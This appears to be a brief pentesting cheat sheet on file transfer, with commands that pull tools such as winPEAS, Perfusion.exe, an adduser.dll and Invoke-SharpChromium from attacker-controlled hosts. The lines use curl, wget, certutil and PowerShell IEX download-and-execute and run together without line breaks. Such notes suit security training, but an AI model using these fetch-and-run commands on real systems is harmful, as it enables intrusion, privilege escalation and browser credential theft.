Transferencia de archivos
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...curl http://<ATACKER-IP>:<PORT>/<FILENAME> -o <OUTPUT-FILENAME>powershell "IEX(New-Object Net.WebClient).downloadString('http://<attacking-machine-IP>:8080/winPEAS.ps1')" > winpeas.txtcertutil.exe -urlcache -f http://10.10.14.137:8000/Perfusion.exe Perfusion.exepython3 -m http.server <PORT>wget "http://<ATTACKER-IP>:<PORT>/adduser.dll" -outfile "adduser.dll"IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSh
arpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')Last updated